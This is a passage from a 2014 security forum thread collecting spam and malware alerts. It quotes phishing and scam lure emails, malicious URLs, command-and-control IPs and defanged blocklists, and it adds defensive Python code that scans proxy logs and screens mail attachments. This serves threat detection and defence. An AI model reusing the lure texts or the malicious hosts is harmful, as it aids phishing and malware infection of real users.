    Global Payments and Cash Management
    Bank of America (BOA)
    This is an auto-generated email, please DO NOT REPLY. Any replies to this
    email will be disregarded...


The attached ZIP file has the name original copy.zip and contains the original copy.scr file. At the time of writing, 12 of the 55 AV engines did detect the trojan at Virus Total**..."
** https://www.virustot...c1635/analysis/
___

Fake 'My new photo ;)' SPAM - malware attachment
- http://blog.mxlab.eu...zzor-2o-trojan/
Sep 16, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “My new photo ;)”. This email is sent from a spoofed address and has the following short body in very poor English:
    my new photo ;)
    if you like my photo to send me u photo


The attached ZIP file has the name photo.zip; once extracted, a folder photo is available that contains the 127 kB large file photo.exe. The trojan is known as a variant of Trojan.Win32.Swizzor.2!O. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustot...817cb/analysis/
... Behavioural information
TCP connections:
131.253.40.1: https://www.virustot....1/information/
137.254.60.32: https://www.virustot...32/information/
134.170.188.84: https://www.virustot...84/information/
157.56.121.21: https://www.virustot...21/information/
91.240.22.62: https://www.virustot...62/information/
___

Fake USPS SPAM - word doc malware
- http://myonlinesecur...rd-doc-malware/
16 Sep 2014 - "'USPS Postal Notification Service' pretending to come from USPS is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecur...ion-service.png

16 September 2014: Label.zip (82 kb): Extracts to: Label.exe
Current Virus total detections: 20/54*. This USPS Postal Notification Service is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410841682/
___

Fake 'inovice' SPAM ...
- http://blog.dynamoo....ember-spam.html
16 Sep 2014 - "This spam mis-spells "invoice" in the subject line, and has an .arj file attached that contains a malicious binary.
Example subjects:
inovice 8958508 September
inovice 7682161 September
inovice 4868431 September
inovice 0293991 September
Body text:
This email contains an invoice file attachment


The name of the attachment varies, but is in the format invoice_8958508.arj which contains a malicious executable invoice_38898221_spt.exe which has a VirusTotal detection rate of just 3/54*. The ThreatTrack report...and Anubis report show a series of DGA domains... that are characteristic of Zbot, although none of these domains are currently resolving. If your organisation can -block- .arj files at the mail perimeter then it is probably a good idea to do so."
* https://www.virustot...sis/1410860283/
... Behavioural information
TCP connections:
208.91.197.27: https://www.virustot...27/information/
___

Fake FAX SPAM... again
- http://blog.dynamoo....w-fax-spam.html
16 Sep 2014 - "... a facsimile transmission...
From:     Fax
Date:     16 September 2014 11:05
Subject:     You've received a new fax
New fax at SCAN0204102 from EPSON by ...
Scan date: Tue, 16 Sep 2014 15:35:59 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can download your fax message at: ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...


The link is so obviously not anything to do with Google. Clicking on it loads another script from triera .biz.ua/twndcrfbru/zjliqkgppi.js which in turn downloads a ZIP file from www .yerelyonetisim .org.tr/pdf/Message_2864_pdf.zip which has a VirusTotal detection rate of 3/55*. This malware then phones home... Recommended blocklist:
188.165.204.210
brisamarcalcados .com.br
triera .biz.ua
yerelyonetisim .org.tr
ngujungwap .mobi.ps
"
* https://www.virustot...sis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
198.143.152.226: https://www.virustot...26/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake forgeries 'Copied invoices' SPAM
- http://blog.dynamoo....oices-spam.html
16 Sep 2014 - "Kifilwe Shakong is a real person who works for Cashbuild in South Africa. She is not the person sending these messages, they are forgeries. Cashbuild's systems have not been compromised in any way. As you might guess, these messages have a malicious attachment.
From:     Kifilwe Shakong [kshakong@ cashbuild .co.za]
Date:     16 September 2014 12:17
Subject:     Copied invoices
The attached invoices are copies. We will not be able to pay them. Please send clear invoices.
This outbound email has been scanned by the IS Mail Control service.
For more information please visit http ...
The attached invoices are copies. We will not be able to pay them. Please send clear invoices...


Attached is a file with a filename in the format SKMBT_75114091015230.zip which in turn contains a malicious executable SKMBT_75114091015230.exe which has a very low detection rate at VirusTotal of just 1/54*... the malware attempts to phone home to the following domains and IPs which are worth blocking:
golklopro .com
94.100.95.109
31.134.29.175
176.213.10.114
176.8.72.4
176.99.191.49
78.56.92.46
195.114.159.232
46.98.234.76
46.185.88.110
46.98.122.183
46.211.198.56
195.225.147.101
176.53.209.231
..."
(More detail at the dynamoo URL above.)
* https://www.virustot...sis/1410866733/
... Behavioural information
DNS requests
golklopro .com
cosjesgame .su
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Unpaid invoice' SPAM - leads to Angler Exploit Kit
- http://blog.dynamoo....spam-leads.html
16 Sep 2014 - "This convincing-looking but -fake- spam leads to an exploit kit.
    From:     Christie Foley [christie.foley@ badinsky .sk]
    Reply-to:     Christie Foley [christie.foley@ badinsky .sk]
    Date:     16 September 2014 13:55
    Subject:     Unpaid invoice notification ...


Screenshot: https://1.bp.blogspo...600/invoice.png

The link in the email goes to:
[donotclick]tiragreene .com/aspnet_client/system_web/4_0_30319/invoice_unn.html
Which in turn goes to an Angler EK landing page at:
[donotclick]108.174.58.239:8080 /wn8omxftff
You can see the URLquery report for the EK here*. I would strongly recommend blocking web traffic to 108.174.58.239 (ColoCrossing, US)."
* http://urlquery.net/...d=1410873578924

- http://myonlinesecur...xploit-malware/
16 Sep 2014
___

Fake 'PAYMENT SCHEDULE' email - 419 SCAM
- http://myonlinesecur...ngozi-o-iweala/
16 Sep 2014 - "'RE:YOUR PAYMENT SCHEDULE' pretending to come from Dr Mrs Ngozi O. Iweala is a -scam- . After all the current batches of very nasty and tricky malware being attached to emails or as links in emails, it really is a change to see a good old fashioned 419 scam:
    Attn:Beneficiary,
     My name is Mrs Ngozi Okonjo Iweala,I am the current minister of finance of Nigeria.
     Your payment file has been in our desk since two weeks ago and Mr.Croft from Australia submitted claims on your funds stating that
    you have given him the authority to claim the funds but we stopped him first until we receive a confirmation from any of you. You are
    therefore requested to get back to us to confirm the authenticity of the application of claim submitted by Mr Croft or if you did not
    authorized him for any reason,urgently get back to us so that we can direct you on how you are going to receive your fund via Automated
    Teller Machine System( ATM CARD).
     Please,response back with all your full details mostly your confidential address where you will have the ATM card delivered to you. Your urgent response is highly needed.
     Reply also to : fminister88 @gmail .com
     Your faithfully.
     Dr Mrs Ngozi O. Iweala.
    Finance Of Minister.


[Arrgghh...]
___

Fake Nat West SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
16 Sep 2014 - "'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     We have arranged a BACS transfer to your bank for the following amount : 4933.00
    Please find details at our secure link below: ...


This is another version of the same upatre zbot downloaders that have been spammed out today with exactly the same payload as 'NatWest You have a new Secure Message – file-4430 – fake PDF malware'*. This 'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecur...ke-pdf-malware/

- https://www.virustot...sis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
198.143.152.226: https://www.virustot...26/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Dhl Delivery' SPAM - contains trojan
- http://blog.mxlab.eu...ontains-trojan/
Sep 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject 'Fwd: Dhl Delivery Attempt (Invoice Documents)'. This email is sent from the spoofed address 'enquiry@ dhl .com' and has the following body:
    We attempted to deliver your item at 17:32pm on Sept 15th, 2014.
    The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically generated.
    You may rearrange delivery by visiting the link on the attached document or pick up the item at the DHL depot/office indicated on the receipt attached.
    If the package is not rescheduled for delivery or picked up within 48 hours, it will be returned to the sender.
    Airway Bill No: 7808130095
    Class: Package Services
    Service(s): Delivery Confirmation
    Status: eNotification sent
    Print this label to get this package at our depot/office.
    Thank you
    © 2014 Copyright© 2013 DHL. All Rights Reserved...


The attached ZIP file has the name DHL EXPRESS DELIVERY ATTEMPT.zip and contains the 293 kB large file DHL EXPRESS DELIVERY ATTEMPT.exe. The trojan is known as Trojan/Win32.Necurs, a variant of Win32/Injector.BLYN, W32/Injector.GLA!tr, Backdoor.Bot or Win32.Trojan.Bp-generic.Ixrn. At the time of writing, 6 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustot...sis/1410870424/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 16 September 2014 - 10:48 AM.

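The blocklists quoted in the posts above (the Sage, fax, 'Copied invoices' and Angler items) are printed defanged: a space before each dot, "http ://" with a space, and "[donotclick]" in front of URLs, so they cannot be pasted straight into a proxy or DNS filter. Added example, not code from this forum or from the dynamoo/myonlinesecurity posts: a Python parser that refangs that notation into a set of IPs and domains and then matches proxy log lines against it, including subdomains of a listed domain. The indicator list and the proxy log lines are constructed from indicators quoted above; the log format ('timestamp client method url') is an assumption.

```python
import ipaddress
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple
from urllib.parse import urlsplit

# Undo the posts' defanging: "[donotclick]" prefix, "http ://", "green-fuel .us",
# and the space before a path ("...210 /1509uk1/...").
DEFANG_FIXES = (
    (re.compile(r"\[donotclick\]", re.I), ""),
    (re.compile(r"\s+://"), "://"),
    (re.compile(r"\s+\."), "."),
    (re.compile(r"\s+/"), "/"),
)
HOST_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}$", re.I)


def refang(text: str) -> str:
    """Turn a defanged indicator back into its real form."""
    for pattern, repl in DEFANG_FIXES:
        text = pattern.sub(repl, text)
    return text.strip()


def host_of(indicator: str) -> Optional[str]:
    """Bare host of a URL, host:port or IP string (lower-cased), or None."""
    if "://" not in indicator:
        indicator = "//" + indicator  # make urlsplit treat the start as a netloc
    try:
        return urlsplit(indicator).hostname or None
    except ValueError:
        return None


@dataclass
class Blocklist:
    ips: Set[str] = field(default_factory=set)
    domains: Set[str] = field(default_factory=set)


def parse_blocklist(text: str) -> Blocklist:
    """Collect IPs and domains from a block of defanged indicator lines."""
    bl = Blocklist()
    for raw in text.splitlines():
        line = refang(raw)
        if not line or line.endswith(":"):  # skip headings like "Recommended blocklist:"
            continue
        host = host_of(line)
        if not host:
            continue
        try:
            bl.ips.add(str(ipaddress.ip_address(host)))
        except ValueError:
            if HOST_RE.match(host):
                bl.domains.add(host)
    return bl


def match(bl: Blocklist, host: str) -> Optional[str]:
    """Entry that `host` hits: exact IP, or the domain itself or a parent of it."""
    host = host.lower().rstrip(".")
    if host in bl.ips:
        return host
    labels = host.split(".")
    for i in range(len(labels) - 1):
        parent = ".".join(labels[i:])
        if parent in bl.domains:
            return parent
    return None


def scan_proxy_log(bl: Blocklist, log: str) -> List[Tuple[str, str, str]]:
    """(client, host, matched entry) for each log line whose URL hits the blocklist."""
    hits = []
    for line in log.splitlines():
        fields = line.split()  # assumed format: timestamp client method url
        if len(fields) < 4:
            continue
        host = host_of(fields[3])
        entry = match(bl, host) if host else None
        if entry:
            hits.append((fields[1], host, entry))
    return hits


# Constructed from indicators quoted in the posts above, defanged the same way.
SAMPLE_POST = """Recommended blocklist:
188.165.204.210
green-fuel .us
petitepanda .net
triera .biz.ua
yerelyonetisim .org.tr
golklopro .com
[donotclick]tiragreene .com/aspnet_client/system_web/4_0_30319/invoice_unn.html
[donotclick]108.174.58.239:8080 /wn8omxftff
www .green-fuel .us/upload/box/1509uk1.ltc
"""
# Constructed proxy log lines; the third is a benign control.
SAMPLE_PROXY_LOG = """2014-09-16T11:07:02 10.0.0.14 GET http://www.green-fuel.us/upload/box/1509uk1.ltc
2014-09-16T11:07:05 10.0.0.14 GET http://188.165.204.210/1509uk1/NODE01/0/51-SP3/0/
2014-09-16T11:09:41 10.0.0.22 GET https://www.example.com/index.html
2014-09-16T13:58:10 10.0.0.31 GET http://108.174.58.239:8080/wn8omxftff
"""
BLOCKLIST = parse_blocklist(SAMPLE_POST)

if __name__ == "__main__":
    for client, host, entry in scan_proxy_log(BLOCKLIST, SAMPLE_PROXY_LOG):
        print(f"{client} reached {host} (blocklist entry: {entry})")
```

The parent-domain walk in `match` is what makes `www .green-fuel .us` hit an entry for `green-fuel .us`; an exact-string compare would miss it.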


#1281 AplusWebMaster

Posted 17 September 2014 - 05:14 AM

FYI...

Fake FAX SPAM - malware
- http://blog.dynamoo....you-havent.html
17 Sep 2014 - "This tired old spam format comes with a warmed-over malware attachment.
    From:     Fax [fax@ victimdomain .com]
    Date:     17 September 2014 09:32
    Subject:     You've received a new fax
    New fax at SCAN6405035 from EPSON by https ://victimdomain .com
    Scan date: Wed, 17 Sep 2014 16:32:29 +0800
    Number of pages: 2
    Resolution: 400x400 DPI
    You can secure download your fax message at ...
    (Google Disk Drive is a file hosting service operated by Google, Inc.)


The link in the email downloads an archive file Message_Document_pdf.zip from the same estudiocarraro .com .br site. This has a VirusTotal detection rate of 3/54*. The ThreatTrack report shows that the malware attempts to phone home to:
denis-benker .de/teilen/1709uk1.hit
188.165.204.210/1709uk1/NODE01/0/51-SP3/0/
188.165.204.210/1709uk1/NODE01/1/0/0/
188.165.204.210/1709uk1/NODE01/41/5/4/
Recommended blocklist:
188.165.204.210
denis-benker .de
estudiocarraro .com.br
"
* https://www.virustot...sis/1410943351/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/

188.165.204.210: https://www.virustot...10/information/
___

Fake ADP Invoice SPAM – PDF malware
- http://myonlinesecur...ce-pdf-malware/
17 Sep 2014 - "'ADP Invoice' pretending to come from billing.address.updates@ adp .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... we always say don’t open any attachment or file sent to you in an email, but with fake or malicious PDF files that is quite difficult.

Screenshot: http://myonlinesecur...licious-pdf.png

17 September 2014: adp_invoice_46887645.pdf
Current Virus total detections: 8/55*. This ADP Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410974477/
___

Android Malware uses SSL for Evasion
- http://blog.trendmic...sl-for-evasion/
Sep 17, 2014 - "... a double-edged sword. Android malware is now utilizing SSL to hide their routines and to evade detection. SSL servers have become a target of Android malware. Malware can use any of the three types of servers... This malware steals user and device information, such as the IMEI, phone number, and images stored in the SD card. Whenever the user starts the app or once the phone reboots, the app will start a backend service to dump the aforementioned information and use a hard-coded Gmail account and password to send the information to a particular email address... ANDROIDOS_TRAMP.HAT attempts to disguise itself as an official Google service. It collects user information like the phone number, location, and contact list. Upon execution, it registers GCMBroadCastReceiver. The malicious app will then post the -stolen- data via Google Cloud Messaging. Google Cloud Messaging is used for C&C communication of the malicious app. Commands such as “send message,” “block call,” and “get current location” are sent and received via Google Cloud Messaging... ANDROIDOS_BACKDOORSNSTWT.A triggers its C&C attack through Twitter. The malware crawls for Twitter URLs and combines the obtained information with a hard-coded string to generate a new C&C URL for attacks. The stolen information is sent to the generated URL... Cybercriminals may have also targeted SSL servers and services because they do not need to exert much effort into gaining access to these sites. They can do so via normal and legal means, such as buying a virtual host from web-hosting services or registering a new account on Twitter. Should we see more use (and abuse) of SSL, detecting malicious apps may not be enough. Collaboration with server providers and services will be needed in removing related URLs, email addresses, and the like. Given the constant evolution of Android malware, we advise users to download Android apps only from legitimate sources. Third-party app stores may not be as strict when it comes to scanning for potentially malicious apps. We also advise users to use a security solution that can detect and block threats that may cause harm to mobile devices..."
(More detail at the trendmicro URL above.)
___

Fake UKFast invoice SPAM – malware attachment
- http://myonlinesecur...ke-pdf-malware/
17 Sep 2014 - "'UKFast invoice' pretending to come from UKFast Accounts <accounts@ ukfast .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subject line and the to: lines on these emails are blank...

Screenshot: http://myonlinesecur...ast-invoice.png

17 September 2014: Invoice-17009106-001.zip (137 kb): Extracts to: Invoice 17009106-001.exe
Current Virus total detections: 0/55*. This UKFast invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410939664/
___

Fake Invoice SPAM ...
- http://myonlinesecur...ke-pdf-malware/
17 Sep 2014 - "'Strabane Weekly News INV0071981 – Newspaper copy' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... -same- malware as one version of today’s UKFast invoice – fake PDF malware*... The email looks like:
    Dear Sir,
    Please find attached the copy of the advert for INV0071981 in the Strabane Weekly News.
    Thank you,
    Darragh


This 'Strabane Weekly News INV0071981 – Newspaper copy' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecur...ke-pdf-malware/
 

:grrr:  :ph34r:


Edited by AplusWebMaster, 17 September 2014 - 01:10 PM.

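Nearly every report in the posts above describes the same trick: a ZIP whose only member is a .scr or .exe wearing a document icon, an .arj archive most users cannot even open, or a file named .pdf that is really an executable, and the myonlinesecurity write-ups point out that hidden "known file extensions" make these look like documents. Added example (my own code, not the posts' or the quoted blogs'): a Python mail-gateway check that rejects .arj outright, opens ZIP attachments in memory, and flags executable extensions, document double extensions, and an 'MZ' executable header hiding behind a document extension. The sample attachments are constructed with dummy bytes; the extra extensions .pif/.com and the double-extension member name are assumptions.

```python
import io
import os
import zipfile
from typing import Dict, List

# Extensions the quoted campaigns hide behind document icons (.exe, .scr);
# .pif and .com are added on my own assumption.
EXEC_EXTS = {".exe", ".scr", ".pif", ".com"}
# Document types the lures pretend to be.
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}
# Archive formats rejected outright, following the .arj advice above.
REJECT_EXTS = {".arj"}


def looks_like_pe(data: bytes) -> bool:
    """Every Windows executable starts with the DOS 'MZ' header."""
    return data[:2] == b"MZ"


def check_name(name: str) -> List[str]:
    """Flag executable extensions and 'something.pdf.exe' double extensions."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    findings = []
    if ext in EXEC_EXTS:
        findings.append(f"{name}: executable extension {ext}")
        if len(parts) > 2 and "." + parts[-2] in DOC_EXTS:
            findings.append(f"{name}: document double extension .{parts[-2]}{ext}")
    return findings


def inspect_attachment(filename: str, data: bytes) -> List[str]:
    """Reasons to quarantine an attachment; an empty list means nothing was found."""
    ext = os.path.splitext(filename.lower())[1]
    if ext in REJECT_EXTS:
        return [f"{filename}: archive type {ext} is rejected at the mail perimeter"]
    if ext != ".zip":
        findings = check_name(filename)
        if ext not in EXEC_EXTS and looks_like_pe(data):
            findings.append(f"{filename}: MZ header but extension {ext or '(none)'}")
        return findings
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [f"{filename}: named .zip but not a valid ZIP archive"]
    findings = []
    with archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            findings += check_name(info.filename)
            member_ext = os.path.splitext(info.filename.lower())[1]
            if member_ext not in EXEC_EXTS:
                with archive.open(info) as member:  # only the first two bytes are read
                    if looks_like_pe(member.read(2)):
                        findings.append(f"{info.filename}: MZ header but extension {member_ext or '(none)'}")
    return findings


def build_zip(members: Dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP so the example runs without files on disk."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


# Constructed samples modelled on the attachment names quoted above. Member
# bodies are dummy bytes with an 'MZ' prefix, not real malware.
FAKE_PE = b"MZ" + b"\x00" * 62
SAMPLES: Dict[str, bytes] = {
    "SecureMessage.zip": build_zip({"SecureMessage.scr": FAKE_PE}),
    "photo.zip": build_zip({"photo/photo.exe": FAKE_PE}),
    "Message_2864_pdf.zip": build_zip({"Message_2864.pdf.exe": FAKE_PE}),  # member name constructed
    "adp_invoice_46887645.pdf": FAKE_PE,  # name says PDF, bytes say PE
    "invc_2014-09-15_15-07-11_6767390.arj": b"\x60\xea" + b"\x00" * 8,
    "report.zip": build_zip({"report.pdf": b"%PDF-1.4\n%%EOF\n"}),  # benign control
}


def triage(samples: Dict[str, bytes]) -> Dict[str, List[str]]:
    return {name: inspect_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in triage(SAMPLES).items():
        print(name, "->", findings or ["clean"])
```

The header check matters because the name alone is not enough: the ADP sample above was delivered as a bare `.pdf`, and only the first two bytes give it away.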


#1282 AplusWebMaster

Posted 18 September 2014 - 06:27 AM

FYI...

Fake NatWest SPAM - malware attached
- http://blog.dynamoo....voice-spam.html
18 Sep 2014 - "This -fake- NatWest invoice (since when did banks send invoices?) leads to a malicious ZIP file.
    From:     NatWest Invoice [invoice@ natwest .com]
    Date:     18 September 2014 11:06
    Subject:     Important - New account invoice
      Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here or follow the link below ...
    Thank you for choosing NatWest...


The link in this particular email goes to bnsoutlaws .co.uk/qvgstopmdi/njfeziackv.html which then downloads a ZIP file from bnsoutlaws .co.uk/qvgstopmdi/Account_Document.zip which in turn contains a malicious executable Account_Document.scr which has a VirusTotal detection rate of just 1/53*. The ThreatTrack report [pdf] shows that the malware attempts to call home...
Recommended blocklist:
188.165.204.210
liverpoolfc .bg
bnsoutlaws .co.uk
"
* https://www.virustot...sis/1411032337/
... Behavioural information
TCP connections
91.215.216.52: https://www.virustot...52/information/
188.165.204.210: https://www.virustot...10/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/

UPDATE: The -same- malware is also being pushed by a fake Lloyds Bank email...
From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
Date:     18 September 2014 11:45
Subject:     Important - Commercial Documents
Important account documents
Reference: C146
Case number: 68819453
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...


- http://myonlinesecur...ke-pdf-malware/
18 Sep 2014
Screenshot: http://myonlinesecur...unt-invoice.png
___

USAA Phish ...
- https://blog.malware...hing-campaigns/
Sep 18, 2014 - "... phish pages targeting the United Services Automobile Association (USAA), a Fortune 500 financial company that offers banking, investing, and insurance to US Military soldiers and their families. Here is what the fake page looks like:
> https://blog.malware...lt-1024x851.png
... Users are then led to this page:
> https://blog.malware...in-1024x665.png
... Clicking the “Next” button opens this page wherein users can supply their secret questions and their respective answers:
> https://blog.malware...na-1024x789.png
... Clicking “Next” opens the last page, which asks for more information that needs “updating”, including full name and date of birth:
> https://blog.malware...fo-967x1024.png
... Users are then shown the door by redirecting them to the legitimate USAA page one sees when they log out... In case you receive emails claiming to be from USAA, please note that they do -not- send out emails to their clients, or to anyone for that matter, asking for their information. Here is a short list of tips to help you steer clear of USAA phishing attempts:
- Remain aware of phishing cases involving USAA. It’s also good to have their contact details handy in the event of fraud or account compromise.
- The legitimate USAA website, www.usaa.com, is a verified domain. As such, look for the green box beside its URL on the browser address bar. This site also uses SSL encryption, which means that it uses the https protocol, making it safe to access even over public networks.
- Ensure that the anti-phishing feature of your Internet browser is enabled. Do this for your antivirus software as well..."
___

Fake eFax SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
18 Sep 2014 - "'eFax Report' pretending to come from eFax Report <noreply@ efax-reports .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    INCOMING FAX REPORT
    Date/Time: Thursday, 18.09.2014
    Speed: 353bps
    Connection time: 08:02
    Page: 4
    Resolution: Normal
    Remote ID: 611-748-177946
    Line number: 3
    DTMF/DID:
    Description: Internal only ...


18 September 2014: fax-id9182719182837529.zip (189 kb): Extracts to: fax-id9182719182837529.scr
Current Virus total detections: 1/54*. This eFax Report is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411049220/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Line Voice Message Spam
- http://threattrack.t...ce-message-spam
18 Sep 2014 - "Subjects Seen:
    You have a voice message
Typical e-mail details:
    LINE Notification
    You have a voice message, listen it now.
    Time: 21:12:45 14.10.2014, Duration: 45sec


Malicious URLs:
    iagentnetwork .com/sql.php?line=gA7EF9bA7ns68jJ0eBi8ww
Malicious File Name and MD5:
    LINE_Call_<phone number>.zip (7FC6D33F62942B55AD94F20BDC7A3797)
    LINE_Call_<phone number>.exe (C3E0F4356A77D18438A38110F8BD919E)


Screenshot: https://gs1.wac.edge...Jmds1r6pupn.png

Tagged: Line.me, Kuluoz

147.202.201.24: https://www.virustot...24/information/
___

Chinese hacked U.S. military contractors ...
- http://www.reuters.c...N0HC1TA20140918
Sep 18, 2014 - "Hacks associated with the Chinese government have repeatedly infiltrated the computer systems of U.S. airlines, technology companies and other contractors involved in the movement of U.S. troops and military equipment, a U.S. Senate panel has found. The Senate Armed Services Committee's year-long probe, concluded in March but made public on Wednesday, found the military's U.S. Transportation Command, or Transcom, was aware of only two out of at least -20- such cyber intrusions within a single year. The investigation also found gaps in reporting requirements and a lack of information sharing among U.S. government entities. That in turn left the U.S. military largely unaware of computer compromises of its contractors..."
 

:grrr:  :ph34r: :ph34r:


Edited by AplusWebMaster, 18 September 2014 - 03:02 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1283 AplusWebMaster


Posted 19 September 2014 - 07:08 AM

FYI...

Fake 'voice mail' SPAM ...
- http://blog.dynamoo....e-leads-to.html
19 Sep 2014 - "This -fake- voice mail message leads to malware:
    From:     Microsoft Outlook [no-reply@ victimdomain .com]
    Date:     19 September 2014 11:59
    Subject:     You have received a voice mail
    You received a voice mail : VOICE976-588-6749.wav (25 KB)
    Caller-Id: 976-588-6749
    Message-Id: D566Y5
    Email-Id: <REDACTED>
    Download and extract to listen the message.
    We have uploaded voicemail report on dropbox, please use the following link to download your file...
    Sent by Microsoft Exchange Server


The link in the email messages goes to www .prolococapena .com/yckzpntfyl/mahlqhltkh.html first and then downloads a file from www .prolococapena .com/yckzpntfyl/Invoice102740_448129486142_pdf.zip which contains exactly the -same- malicious executable being pushed in this earlier spam run*."
* http://blog.dynamoo....-yet-again.html
19 Sep 2014 - "... shows network activity to hallerindia .com on 192.185.97.223. I would suggest that this is a good domain to -block- ..."
Screenshot: https://2.bp.blogspo...600/natwest.png

192.185.97.223: https://www.virustot...23/information/

- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014
Screenshot: http://myonlinesecur...t-statement.png
Current Virus total detections: 1/54*
* https://www.virustot...sis/1411120481/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Police Suspect' SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014 - "'City of London Police Homicide Suspect' pretending to come from City of London Police is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Bulletin Headline: HOMICIDE SUSPECT
    Sending Agency: London City Police
    Sending Location: GB – London – London City Police
    Bulletin Case#: 14-62597
    Bulletin Author: BARILLAS #1169
    Sending User #: 92856
    APBnet Version: 684593
    The bulletin is a pdf attachment to this email.
    The Adobe Reader (from Adobe .com) will display and print the bulletin best.
    You can Not reply to the bulletin by clicking on the Reply button in your email software.


Of course it is -fake- and -not- from any Police force or Police service in UK or worldwide.
19 September 2014: Homicide-case#15808_pdf.zip : Extracts to:   Homicide-case#15808_pdf.exe
Current Virus total detections: 4/55* . This 'City of London Police Homicide Suspect' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411120670/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
192.185.97.223: https://www.virustot...23/information/
___

Fake 'Courier Svc' SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014 - "'TNT UK Limited Package tracking' pretending to come from TNT COURIER SERVICE <tracking@tnt.co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     TNT COURIER SERVICE (TCS)
    Customer/Delivery Services Department
    Central Pk Est/Mosley Rd, Trafford Park
    Manchester, M17 1TT UK.
    DETAILS OF PACKAGE
    Reg order no: 460911612900
    Your package have been picked up and is ready for dispatch.
    Connote #           :               460911612900
    Service Type      :               Export Non Documents – Intl
    Shipped on         :               18 Sep 14 12:00
    Order No                    :       4240629
    Status          :       Driver’s Return
    Description     :      Wrong Address
    Service Options: You are required to select a service option below.
    The options, together with their associated conditions.
    Please check attachment to view information about the sender and package.


19 September 2014: Label_GB1909201488725UK_pdf.zip: Extracts to: Label_GB1909201488725UK_pdf.exe
